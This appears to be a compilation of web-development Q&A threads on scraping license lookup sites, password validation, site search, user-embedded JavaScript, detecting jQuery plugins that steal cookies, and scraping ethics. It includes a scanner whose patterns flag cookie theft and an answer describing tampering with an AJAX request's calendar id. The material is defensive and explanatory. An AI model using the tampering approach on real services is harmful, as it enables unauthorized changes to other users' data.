I work in a small healthcare-related office, and we often have to look up license numbers and other official numbers for physicians. We use free, publicly available websites to do so. I've been tasked with figuring out a way to enter a physician's name and get back the results from all of the websites in a single view, to reduce the time spent going through each website. I'm familiar with JavaScript, PHP and Ruby, but am by no means an expert. My question is, where should I start? I don't need anyone to write the code for me, but I can't seem to form the right question to Google for answers. I'm fairly sure this is possible; I'm just not sure where to start developing my idea. Any help would be appreciated.

It sounds like you need to do some screen scraping, which may or may not be allowed by the terms and conditions of the sites you're using - you should check that first.
If there aren't any restrictions on automatic retrieval and querying, you'll want to read up on PHP's cURL module, and simulate the form actions that are performed when you manually query the sites. You can use your browser's developer console to see what scripts and pages are called when you run queries - it's quicker than trying to work it out from the page source.
You'll get back the HTML from the pages, which you'll need to parse. Depending on the format on the page, a few simple regexes might do the trick, but you'll likely need to tailor them for each site you query.
Again, please double check that the sites you're using allow you to run scripted queries - if you're in any doubt, you should email them and explain what you plan to do, and ask if they're ok with it.
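As a rough illustration of the parsing step, here is a minimal JavaScript sketch (the question mentions JavaScript as well as PHP). The sample markup, the "License Number" label, and the function name extractLicenseNumber are all made up for the example; each real site will need its own pattern.

```javascript
// Hypothetical helper: pull a license number out of a results page.
// The markup and the "License Number" label are assumptions for illustration.
function extractLicenseNumber(html) {
  // Match the label cell, then capture the text of the next table cell.
  const pattern = /License Number<\/td>\s*<td[^>]*>\s*([^<]+?)\s*<\/td>/i;
  const match = pattern.exec(html);
  return match ? match[1] : null;
}

const sampleHtml = `
  <table>
    <tr><td>Name</td><td>Jane Doe</td></tr>
    <tr><td>License Number</td><td class="val"> MD-12345 </td></tr>
  </table>`;

console.log(extractLicenseNumber(sampleHtml));
```

A pattern like this breaks as soon as the site changes its markup, which is why it has to be tailored (and re-checked) per site.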


HTML + JavaScript or JavaScript + JSP?

Hi I'm new to dynamic web dev. I've searched this site but couldn't find anything similar.
I want to implement a password checker, for robustness, length, etc. Fairly conventional. The thing is, I have 2 options: 1. embed JavaScript inside an HTML file. 2. embed JavaScript inside a JSP file.
With a little preliminary research it seems that most people recommend the former, that is, to go with HTML. I want to know why. I could be completely wrong; in that case I also want to know why.
The "how" isn't all that important; the "why" is.
Edit: I know this question is full of flaws (for example JSP and HTML aren't mutually exclusive) but please indulge me a little bit and tell me which scheme is more appropriate, if I want to get things done front end, in a user's browser.
Edit #2: Sorry I did not provide any background information: I am working on a larger project and the password checker is just a part of it. The project itself is a dynamic web project that relies predominantly on Java servlets.
As you state, you are new to dynamic web development. JSP is a server-side technology, just like PHP and others. If you want to verify a password, you can use Ajax to check for a match in your database and, if a match is found, create a session and redirect the user to the logged-in page. If I have misunderstood your question, please clarify it.
Depends on your use-case. In some cases, just the front-end is enough. In many, I would say both is better.
By putting it in the front-end/client-side (the "HTML"), you create a more user-friendly approach, since you can rapidly and continuously evaluate the users' input and give them feedback.
If the application doesn't need to be particularly robust from a security perspective, this can be plenty.
The downside of HTML-only validation of any user input is that it can easily be bypassed. As a programmer, I could figure out what it's doing and easily bypass any and all client-side protections. Users can also just disable JavaScript wholesale, so if your site otherwise works without JavaScript, they won't get any validation. This is why "security" on the client side is never a thing. Never trust the client.
Implementing it only on the back-end/server-side ("JSP"), you can lock down the security since the end-user can't bypass any of your validation. It must match the rules you set forth.
The downside to server-side is that you must send the data to the server to be analyzed, then wait for a response. While this may be fast, it's still much slower than client-side.
By doing it in both, you get the best of both worlds. You get the rapid feedback for the end-user without having to send any data to the server, and you get the full protections of making sure it is properly validated on the server-side.
The downside to this, of course, is that you have to double up on your code, so it's more effort. That's why you want to weigh the pros and cons in your particular case, as there isn't a single "best" answer.
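To make the client-side half concrete, here is a minimal sketch of a checker that can run on every keystroke. The rules (8 characters, mixed case, a digit) and the name checkPassword are assumptions for illustration, not a recommendation; whatever rules you choose would have to be repeated on the server, since this code can be bypassed.

```javascript
// Hypothetical rules for illustration: at least 8 characters,
// one lowercase letter, one uppercase letter, and one digit.
function checkPassword(password) {
  const problems = [];
  if (password.length < 8) problems.push("too short");
  if (!/[a-z]/.test(password)) problems.push("no lowercase letter");
  if (!/[A-Z]/.test(password)) problems.push("no uppercase letter");
  if (!/[0-9]/.test(password)) problems.push("no digit");
  // ok is true only when no rule was violated.
  return { ok: problems.length === 0, problems };
}

console.log(checkPassword("abc"));
console.log(checkPassword("Str0ngEnough"));
```

In a page, you would call this from an input event handler and show the list of problems next to the field.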
If the HTML is enough for you - why should you use .jsp?
You need .jsp for creating dynamic content and it's gonna be compiled as Servlet - do you actually need Servlet in this case?
If security is not a big concern then HTML + JavaScript should be fine. It will be responsive and lead to a better user experience.
If this is an external-facing application on the web, then, as mentioned in some of the other answers, go with the JSP approach.

How do I add a full site search to a website in Javascript/jQuery?

I am creating an HTML5 website and I need to create a site search box that displays results in a results page with a description and photo.
How would I go about this?
I have looked a lot and only see Google search, and that's not what I'm after.
Can this be done without PHP or Rails?
I'm looking for purely JS, HTML5, CSS and jQuery.
Thanks, and a point in the correct direction would be great.
An example is this WordPress site's search: http://agroamerica.com/
I don't want to use WP, but to hand-code it.
Any help is great.
Your best bet, given that you don't want to implement a third party indexing service, would be to set an indexing function on your server's back end to handle search requests. You mentioned Rails, and there are some pretty great gems for this.
One point of trouble you will have with this question is that, in my experience, full site search functionality without a back end / database to query is not a very useful solution for any applications I've seen.
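To make that trade-off concrete: without a back end, about the most you can do is ship a prebuilt list of pages to the browser and filter it there. The sketch below assumes a hand-maintained index; the page records, field names, and the searchPages function are hypothetical.

```javascript
// Hypothetical, hand-maintained index: one record per page.
const pages = [
  { url: "/about.html", title: "About us", description: "Who we are and where we farm.", image: "/img/about.jpg" },
  { url: "/bananas.html", title: "Bananas", description: "Our banana farms and export process.", image: "/img/bananas.jpg" },
  { url: "/contact.html", title: "Contact", description: "How to reach our export office.", image: "/img/contact.jpg" },
];

// Return the records whose title or description contains every query term.
function searchPages(index, query) {
  const terms = query.toLowerCase().split(/\s+/).filter(Boolean);
  if (terms.length === 0) return [];
  return index.filter((page) => {
    const text = (page.title + " " + page.description).toLowerCase();
    return terms.every((term) => text.includes(term));
  });
}

console.log(searchPages(pages, "export").map((p) => p.url));
```

This works for a handful of pages, but the whole index has to be shipped to every visitor and kept up to date by hand, which is the limitation described above.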
However, given that you want to keep it JS, you might look into the MEAN stack (MongoDB, Express.js, Angular.js, Node.js), which does some pretty sweet things like two-way data binding. It's a pure JavaScript solution (albeit not a purely front-end solution).
Honestly, it sounds like you might be biting off too much to start with. Try working through a scripting language on a site like Codecademy and learning about basic web application architectures like MVC, a common way to organize the parts of a web application (used by the aforementioned Rails). Stack Overflow users can be pretty brutal when you ask questions about advanced functionality without some understanding of its underlying elements or functional requirements, and building search engines from the ground up has historically been the stuff of doctoral dissertations.
Good luck!

Saving & embedding user's own javascript code

I'm hosting a small service where people can create online calendars. I'm playing with the idea of allowing users to save & embed their own javascript/html/css to their calendars.
I'm a bit worried about the security implications - are there ways to use XSS etc. so that a user's JavaScript code could affect calendars other than the one where the code is embedded?
From the customer's perspective, the JS on the page should be allowed to change all aspects of the page.
I guess the safest way would be to only allow custom HTML/CSS, but the ability to modify the layout and functionality of the calendar with JS would be a nice feature to have.
This can be very dangerous, for the same reason that eval is evil.
You're basically giving the user an opportunity to run malicious scripts.
Example: You are using AJAX to update something on your server. I come along, open up my trusty Firebug, see the AJAX request, and decide to wreak a little havoc, because that's what I do. I just rewrite the AJAX call, change the id of my calendar to some random one, and bam, that's my dirty deed for the day.
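The tampered request in that example only succeeds if the server trusts the calendar id it is sent. A minimal sketch of the server-side check, assuming an in-memory ownership map and hypothetical names (calendarOwners, canUpdateCalendar); a real service would look this up in its database and take the user from the authenticated session:

```javascript
// Hypothetical in-memory data: which user owns which calendar.
const calendarOwners = new Map([
  ["cal-1", "alice"],
  ["cal-2", "bob"],
]);

// Never trust the calendar id in the request on its own; compare it
// against the user the server has authenticated for this session.
function canUpdateCalendar(sessionUser, calendarId) {
  const owner = calendarOwners.get(calendarId);
  // Unknown calendars are rejected outright.
  return owner !== undefined && owner === sessionUser;
}

console.log(canUpdateCalendar("alice", "cal-1"));
console.log(canUpdateCalendar("alice", "cal-2"));
```

This only covers forged requests. It does nothing about what an embedded script can do inside the page of someone viewing that calendar.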

How can we find out whether a downloaded jQuery plugin is trying to connect to its developer's site?

I often download jQuery plugins.
How can I check whether a script is stealing any information (such as the user's cookie or session id) and sending it to its developer's server?
In PHP, we check for backdoor scripts by looking for certain functions (system, passthru, shell_exec, etc.). Are there equivalent functions in JavaScript that a plugin would use to connect to its developer's site?
Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.
Of course, some code may be too complex to make this a realistic suggestion, particularly if it's been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it'll be using the same functions it uses to communicate with your own site (i.e. jQuery's ajax functions), so you won't see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).
Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, it's likely that other people will have noticed it. Avoid using plugins that don't have enough users to get any comments one way or the other.
Finally, use a tool like Firebug to watch for HTTP requests that occur while you're using a site containing the plugin. If it's communicating with base, it can't hide from you; the browser's debugging tools will happily show you what you need to know.
Hope that helps.
I don't think you can do anything other than read the whole code and check whether it is stealing anything.
Another thing you could do is search the code for strings like 'document.cookie' and 'navigator', and other things that are necessary for stealing information.
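That kind of search can be scripted. The sketch below is only a first-pass filter: the pattern list is an assumption and far from complete, obfuscated code can evade it, and a match is a reason to read that line, not proof of wrongdoing. The names suspiciousPatterns and scanSource are made up for the example.

```javascript
// Patterns worth a closer look; this list is an assumption, not exhaustive.
const suspiciousPatterns = [
  { label: "cookie access", regex: /document\.cookie/ },
  { label: "navigator access", regex: /\bnavigator\./ },
  { label: "hard-coded URL", regex: /https?:\/\/[^\s"'<>)]+/ },
  { label: "eval call", regex: /\beval\s*\(/ },
];

// Report every (line number, label) pair where a pattern matches.
function scanSource(source) {
  const findings = [];
  source.split("\n").forEach((line, i) => {
    for (const { label, regex } of suspiciousPatterns) {
      if (regex.test(line)) findings.push({ line: i + 1, label });
    }
  });
  return findings;
}

// Made-up plugin code to scan.
const pluginSource = [
  "var c = document.cookie;",
  "$.post('http://example.com/collect', { c: c });",
  "var x = 1 + 1;",
].join("\n");

console.log(scanSource(pluginSource));
```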

What would be the most ethical way to consume content from a site that is not providing an API? [closed]

I was wondering what would be the most ethical way to consume a few bytes (386, precisely) of content from a given Site A with an application (e.g. on Google App Engine) in some Site B, while doing it right. No scraping is intended; I really just need to check the status of a public service, and they're currently not providing any API. The markup in Site A has a JavaScript array with the info I need, and being able to access that, let's say, once every five minutes would suffice.
Any advice will be much appreciated.
First of all, thanks very much for the feedback. Site A is basically the website of the company that currently runs our public subway network. I'm planning to develop a tiny free Android app that gives anyone not only a map of the whole network and its stations but also updated information about the availability of the service (those are the bytes I will eventually be consuming), etc.
There will be some very different points of view, but hopefully here is some food for thought:
1. Ask the site owner first; if they know ahead of time, they are less likely to be annoyed.
2. Is the content on Site A accessible on a public part of the site, e.g. without the need to log in?
3. If the answer to #2 is that it is public content, then I wouldn't see an issue, as scraping the site for that information is really no different than pointing your browser at the site and reading it for yourself.
4. Of course, the answer to #3 is dependent on how the site is monetised. If Site A relies on advertisements to generate revenue, then it might not be a good idea to start scraping content, as you would be bypassing how the site makes money.
I think the most important thing to do is talk to the site owner first, and find out straight from them:
1. Whether it is OK for you to be scraping content from their site.
2. Whether they have an API in the pipeline (simply highlighting the desire may prompt them to consider it).
Just my point of view...
Update (4 years later): The question specifically embraces the ethical side of the problem. That's why this old answer is written in this way.
Typically, in such a situation, you contact them.
If they don't like it, then ethically you can't do it (legally is another story, depending on whether the site provides a license, what login/anonymity or other access restrictions they have, whether you have to use test/fake data, etc.).
If they allow it, they may provide an API (which might involve costs; it will be up to you to determine how much the feature is worth to your app), or promise some sort of expected behavior for you, which might itself be scraping, or whatever other option they decide on.
If they allow it but are not ready to help make it easier, then scraping (with its other downsides still applicable) will be all right, at least "ethically".
I would not touch it save for emailing the site admin, then getting their written permission.
That being said -- if you're consuming the content yet not extracting value beyond the value
a single user gets when observing the data you need from them, it's arguable that any
TOU they have wouldn't find you in violation. If however you get noteworthy value beyond
what a single user would get from the data you need from their site -- ie., let's say you use
the data then your results end up providing value to 100x of your own site's users -- I'd say
you need express permission to do that, to sleep well at night.
All that's off however if the info is already in the public domain (and you can prove it),
or the data you need from them is under some type of 'open license' such as from GNU.
Then again, the web is nothing without links to others' content. We all capture then re-post
stuff on various forums, say -- we read an article on cnn then comment on it in an online forum,
maybe quote the article, and provide a link back to it. Just depends I guess on how flexible
and open-minded the site's admin and owner are. But really, to avoid being sued (if push
comes to shove) I'd get permission.
Use a user-agent header which identifies your service.
Check their robots.txt (and re-check it at regular intervals, e.g. daily).
Respect any Disallow in a record that matches your user agent (be liberal in interpreting the name). If there is no record for your user-agent, use the record for User-agent: *.
Respect the (non-standard) Crawl-delay, which tells you how many seconds you should wait before requesting a resource from that host again.
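The robots.txt steps above can be sketched roughly as follows. This is a simplified reading of the format, not a complete parser: it only handles User-agent, Disallow (as plain path prefixes) and Crawl-delay, ignores Allow lines and wildcards, and matches agents liberally by substring. The bot name and the sample file are hypothetical.

```javascript
// Split robots.txt into records: one or more User-agent lines plus rules.
function parseRobots(text) {
  const records = [];
  let current = null;
  let lastWasAgent = false;
  for (const rawLine of text.split(/\r?\n/)) {
    const line = rawLine.replace(/#.*$/, "").trim(); // drop comments
    const sep = line.indexOf(":");
    if (sep === -1) continue;
    const field = line.slice(0, sep).trim().toLowerCase();
    const value = line.slice(sep + 1).trim();
    if (field === "user-agent") {
      // Consecutive User-agent lines share one record.
      if (!lastWasAgent) {
        current = { agents: [], disallow: [], crawlDelay: null };
        records.push(current);
      }
      current.agents.push(value.toLowerCase());
      lastWasAgent = true;
      continue;
    }
    lastWasAgent = false;
    if (!current) continue;
    if (field === "disallow" && value !== "") current.disallow.push(value);
    if (field === "crawl-delay") current.crawlDelay = Number(value);
  }
  return records;
}

// Prefer a record naming our agent; otherwise fall back to "User-agent: *".
function rulesFor(records, userAgent) {
  const name = userAgent.toLowerCase();
  const specific = records.find((r) =>
    r.agents.some((a) => a !== "*" && a !== "" && name.includes(a)));
  return specific || records.find((r) => r.agents.includes("*")) || null;
}

// A path is allowed unless it starts with one of the Disallow prefixes.
function isAllowed(rules, path) {
  if (!rules) return true;
  return !rules.disallow.some((prefix) => path.startsWith(prefix));
}

const robotsTxt = [
  "User-agent: *",
  "Disallow: /private/",
  "Crawl-delay: 10",
  "",
  "User-agent: subway-status-bot",
  "Disallow: /",
].join("\n");

const rules = rulesFor(parseRobots(robotsTxt), "other-bot/1.0");
console.log(isAllowed(rules, "/status"), rules.crawlDelay);
```

When crawlDelay is set, wait at least that many seconds between requests to the same host.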
"no scraping intended" - You are intending to scrape. =)
The only reasonable ethics-based reasons one should not take it from their website are:
They may wish to display advertisements or important security notices to users
This may make their statistics inaccurate
In terms of hammering their site, it is probably not an issue. But if it is:
You probably wish to scrape the minimal amount necessary (e.g. make the minimal number of HTTP requests), and not hammer the server too often.
You probably do not wish to have all your apps query the website; you could have your own website query them via a cronjob. This will allow you better control in case they change their formatting, or let you throw "service currently unavailable" errors to your users, just by changing your website; it introduces another point of failure, but it's probably worth it. This way if there's a bug, people don't need to update their apps.
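The "own website in the middle" idea boils down to a small cache: however many apps ask, the source site is queried at most once per interval. A minimal sketch, assuming a five-minute interval as in the question; createCachedStatus, the injected fetchStatus function, and the fake clock in the demo are all hypothetical, and concurrent requests during a refresh are not handled.

```javascript
// Wraps a fetch function so upstream is asked at most once per ttlMs.
// On failure the last good value is kept and flagged as stale.
function createCachedStatus(fetchStatus, ttlMs, now = () => Date.now()) {
  let lastAttempt = -Infinity; // time of the last upstream request
  let value = null;            // last successfully fetched value
  let fresh = false;           // whether the last request succeeded

  return async function getStatus() {
    if (now() - lastAttempt >= ttlMs) {
      lastAttempt = now();
      try {
        value = await fetchStatus();
        fresh = true;
      } catch (err) {
        fresh = false; // keep the old value, but flag it as stale
      }
    }
    if (value === null) {
      return { status: "service currently unavailable", stale: true };
    }
    return { status: value, stale: !fresh };
  };
}

// Demo with a fake upstream and a fake clock (both hypothetical).
let calls = 0;
let fakeTime = 0;
const getStatus = createCachedStatus(
  async () => { calls += 1; return "Line 1: normal service"; },
  5 * 60 * 1000,
  () => fakeTime
);

async function demo() {
  await getStatus();
  await getStatus();          // served from the cache
  fakeTime += 5 * 60 * 1000;  // five minutes later
  await getStatus();          // triggers a second upstream request
  return calls;
}

demo().then((n) => console.log("upstream requests:", n));
```

In practice fetchStatus would be the one place that knows how to read the source site, so a format change there is fixed on your server rather than in every installed app.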
But the best thing you can do is to talk to the website, asking them what is best. They may have a hidden API they would allow you to use, and perhaps have allowed others to use as well.

